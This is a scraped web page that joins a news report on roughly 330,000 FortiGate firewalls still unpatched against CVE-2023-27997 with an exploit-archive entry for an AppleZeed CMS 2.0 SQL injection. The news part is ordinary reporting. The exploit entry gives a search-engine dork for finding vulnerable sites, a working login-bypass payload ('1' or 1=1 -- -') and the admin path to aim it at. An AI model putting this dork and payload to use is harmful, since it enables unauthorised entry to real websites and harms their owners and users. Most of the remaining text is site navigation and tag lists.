Network Security / Exploit

No less than 330000 FortiGate firewalls are still unpatched and vulnerable to CVE-2023-27997, a critical security flaw affecting Fortinet devices that have come under active exploitation in the wild.

Cybersecurity firm Bishop Fox, in a report published last week, said that out of nearly 490,000 Fortinet SSL-VPN interfaces exposed on the internet, about 69 percent remain unpatched.

CVE-2023-27997 (CVSS score: 9.8), also called XORtigate, is a critical vulnerability impacting Fortinet FortiOS and FortiProxy SSL-VPN appliances that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.

Patches were released by Fortinet last month in versions 6.0.17, 6.2.15, 6.4.13, 7.0.12, and 7.2.5, although the company acknowledged that the flaw may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors.

Bishop Fox's analysis further found that 153,414 of the discovered appliances had been updated to a patched FortiOS version.

Another crucial discovery is that many of the publicly accessible Fortinet devices did not receive an update for the past eight years, with the installations running FortiOS versions 5 and 6.

Given that security flaws in Fortinet devices have been lucrative attack vectors, it's imperative that users move quickly to update to the latest version as soon as possible.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alert: 330,000 FortiGate Firewalls Still Unpatched to CVE-2023-27997 RCE Flaw

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**AppleZeed CMS 2.0 SQL Injection**

Posted Jul 4, 2023

Authored by indoushka

AppleZeed CMS version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection

SHA-256 | b10dc7fe6d4f1a88b74eac3ee061dec5b828171e6513804abc4b45080828e37b

Download | Favorite | View

**AppleZeed CMS 2.0 SQL Injection**

    ====================================================================================================================================| # Title     : AppleZeed CMS v2.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 71.0(32-bit)                                               | | # Vendor    : https://applezeed.com                                                                                              |  | # Dork      : intext:"Power BY applezeed.com "php?id="                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] admin path = /backend/[+] http://TARGET/backend/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,564)
*   Arbitrary (16,123)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,205)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,331)
*   DoS (23,296)
*   Encryption (2,364)
*   Exploit (51,438)
*   File Inclusion (4,203)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,743)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,414)
*   Magazine (586)
*   Overflow (12,629)
*   Perl (1,423)
*   PHP (5,136)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,592)
*   Root (3,574)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,862)
*   Shell (3,170)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,261)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,656)
*   Web (9,602)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,795)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,783)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,075)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,716)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Tag

#ios